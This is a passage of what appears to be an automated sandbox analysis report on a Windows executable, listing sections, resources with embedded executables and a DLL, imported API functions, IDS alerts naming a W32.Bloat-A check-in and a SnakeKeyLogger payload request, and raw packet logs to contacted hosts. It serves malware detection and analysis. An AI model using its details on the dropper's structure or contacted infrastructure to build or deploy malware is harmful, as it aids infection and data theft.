IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x99bec	0x99c00	33fbe30e8a64654287edd1bf05ae7c8c	False	0.5141641260162602	data	6.572957870355296	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x9b000	0x2e54	0x3000	1f5e19e7d20c1d128443d738ac7bc610	False	0.453125	data	4.854620797809023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x9e000	0x11e5	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa0000	0x2a42	0x2c00	21ff53180b390dc06e3a1adf0e57a073	False	0.3537819602272727	data	4.919333216027082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xa3000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa4000	0x39	0x200	a92cf494c617731a527994013429ad97	False	0.119140625	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"	0.7846201577093705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xa5000	0xa980	0xaa00	dcd1b1c3f3d28d444920211170d1e8e6	False	0.5899816176470588	data	6.674124985579511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0xe9bbc8	0xe9bc00	8bf070763451680ed5e3f51b4e25cd38	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xb0dc8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0xb0efc	0x134	data			0.4642857142857143
RT_CURSOR	0xb1030	0x134	data			0.4805194805194805
RT_CURSOR	0xb1164	0x134	data			0.38311688311688313
RT_CURSOR	0xb1298	0x134	data			0.36038961038961037
RT_CURSOR	0xb13cc	0x134	data			0.4090909090909091
RT_CURSOR	0xb1500	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0xb1634	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1804	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xb19e8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1bb8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xb1d88	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xb1f58	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xb2128	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xb22f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb24c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xb2698	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb2868	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_ICON	0xb2950	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.12453095684803002
RT_ICON	0xb39f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 8192	Turkish	Turkey	0.2101313320825516
RT_DIALOG	0xb4aa0	0x52	data			0.7682926829268293
RT_STRING	0xb4af4	0x358	data			0.3796728971962617
RT_STRING	0xb4e4c	0x428	data			0.37406015037593987
RT_STRING	0xb5274	0x3a4	data			0.40879828326180256
RT_STRING	0xb5618	0x3bc	data			0.33472803347280333
RT_STRING	0xb59d4	0x2d4	data			0.4654696132596685
RT_STRING	0xb5ca8	0x334	data			0.42804878048780487
RT_STRING	0xb5fdc	0x42c	data			0.42602996254681647
RT_STRING	0xb6408	0x1f0	data			0.4213709677419355
RT_STRING	0xb65f8	0x1c0	data			0.44419642857142855
RT_STRING	0xb67b8	0xdc	data			0.6
RT_STRING	0xb6894	0x320	data			0.45125
RT_STRING	0xb6bb4	0xd8	data			0.5879629629629629
RT_STRING	0xb6c8c	0x118	data			0.5678571428571428
RT_STRING	0xb6da4	0x268	data			0.4707792207792208
RT_STRING	0xb700c	0x3f8	data			0.37598425196850394
RT_STRING	0xb7404	0x378	data			0.41103603603603606
RT_STRING	0xb777c	0x380	data			0.35379464285714285
RT_STRING	0xb7afc	0x374	data			0.4061085972850679
RT_STRING	0xb7e70	0xe0	data			0.5535714285714286
RT_STRING	0xb7f50	0xbc	data			0.526595744680851
RT_STRING	0xb800c	0x368	data			0.40940366972477066
RT_STRING	0xb8374	0x3fc	data			0.34901960784313724
RT_STRING	0xb8770	0x2fc	data			0.36649214659685864
RT_STRING	0xb8a6c	0x354	data			0.31572769953051644
RT_RCDATA	0xb8dc0	0x44	data			0.8676470588235294
RT_RCDATA	0xb8e04	0x10	data			1.5
RT_RCDATA	0xb8e14	0xe89e98	PE32 executable (GUI) Intel 80386, for MS Windows			0.7985830307006836
RT_RCDATA	0xf42cac	0x3	ASCII text, with no line terminators	Turkish	Turkey	3.6666666666666665
RT_RCDATA	0xf42cb0	0x3c00	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	Turkish	Turkey	0.54296875
RT_RCDATA	0xf468b0	0x64c	data			0.5998759305210918
RT_RCDATA	0xf46efc	0x153	Delphi compiled form 'TFormVir'			0.7522123893805309
RT_RCDATA	0xf47050	0x47d3	Microsoft Excel 2007+	Turkish	Turkey	0.8675150921846957
RT_GROUP_CURSOR	0xf4b824	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xf4b838	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xf4b84c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xf4b860	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xf4b874	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xf4b888	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xf4b89c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0xf4b8b0	0x14	data	Turkish	Turkey	1.1
RT_VERSION	0xf4b8c4	0x304	data	Turkish	Turkey	0.42875647668393785

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll	lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll	CLSIDFromString
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll	ShellExecuteExA, ExtractIconExW
wininet.dll	InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll	OpenSCManagerA, CloseServiceHandle
wsock32.dll	WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll	Netbios

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T22:05:07.404967+0200	TCP	2832617	ETPRO MALWARE W32.Bloat-A Checkin	49737	80	192.168.2.4	69.42.215.252
2024-07-25T22:05:12.802691+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49747	40.68.123.157	192.168.2.4
2024-07-25T22:06:06.778111+0200	TCP	2044887	ET MALWARE Win32/SnakeKeyLogger Payload Request (GET)	49756	443	192.168.2.4	142.250.184.238
2024-07-25T22:05:50.628500+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49755	40.68.123.157	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 22:05:06.793545961 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:05:06.799351931 CEST	80	49737	69.42.215.252	192.168.2.4
Jul 25, 2024 22:05:06.800529003 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:05:06.800713062 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:05:06.806118965 CEST	80	49737	69.42.215.252	192.168.2.4
Jul 25, 2024 22:05:07.404668093 CEST	80	49737	69.42.215.252	192.168.2.4
Jul 25, 2024 22:05:07.404967070 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:05:37.399228096 CEST	80	49737	69.42.215.252	192.168.2.4
Jul 25, 2024 22:05:37.399380922 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:06:05.531462908 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:05.531510115 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:05.532548904 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:05.558727026 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:05.558742046 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:06.389400005 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:06.389471054 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:06.390150070 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:06.390211105 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:06.436527967 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:06.436557055 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:06.436809063 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:06.436866045 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:06.438381910 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:06.484503984 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:06.778120995 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:06.778178930 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:06.778192997 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:06.778237104 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:06.778336048 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:06.778367996 CEST	443	49756	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:06.778410912 CEST	49756	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:06.817018986 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:06.817059994 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:06.817123890 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:06.817384005 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:06.817394018 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.479912043 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.480006933 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.489368916 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.489386082 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.489664078 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.489716053 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.490047932 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.532495022 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.906176090 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.906243086 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.909074068 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.909132004 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.909157038 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.909197092 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.909205914 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.909236908 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.909251928 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.909349918 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.947504997 CEST	49757	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:07.947535992 CEST	443	49757	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:07.953434944 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:07.953485012 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:07.953547955 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:07.953772068 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:07.953787088 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:08.627387047 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:08.627496004 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:08.628169060 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:08.628232956 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:08.630527020 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:08.630539894 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:08.630776882 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:08.630844116 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:08.631794930 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:08.672517061 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:09.043194056 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:09.043281078 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:09.043313026 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:09.043364048 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:09.043636084 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:09.043721914 CEST	443	49758	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:09.043782949 CEST	49758	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:09.089327097 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:09.089370012 CEST	443	49759	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:09.089526892 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:09.097631931 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:09.097650051 CEST	443	49759	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:09.780167103 CEST	443	49759	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:09.780245066 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:09.798939943 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:09.798954010 CEST	443	49759	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:09.799386024 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:09.799392939 CEST	443	49759	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:09.881658077 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:09.881689072 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:09.881936073 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:09.882463932 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:09.882473946 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:09.883728981 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:09.883824110 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:09.883929968 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:09.884128094 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:09.884167910 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.378237009 CEST	443	49759	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:10.378295898 CEST	443	49759	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:10.378345966 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:10.378385067 CEST	443	49759	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:10.378401995 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:10.378477097 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:10.379236937 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:10.379285097 CEST	443	49759	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:10.379354000 CEST	49759	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:10.385051966 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:10.385102987 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:10.385370016 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:10.385602951 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:10.385617971 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:10.581254959 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.581345081 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.582974911 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.582983017 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.583218098 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.584526062 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.632488966 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.682224035 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.682245970 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.682296991 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.682298899 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.682338953 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.683208942 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.683226109 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.683238983 CEST	49760	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.683248997 CEST	443	49760	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.696228981 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.696294069 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.697684050 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.697696924 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.697916985 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:10.699297905 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:10.744508028 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:11.026629925 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:11.026657104 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:11.026771069 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:11.026802063 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:11.027089119 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:11.027107000 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:11.027118921 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:11.027216911 CEST	443	49761	13.107.246.45	192.168.2.4
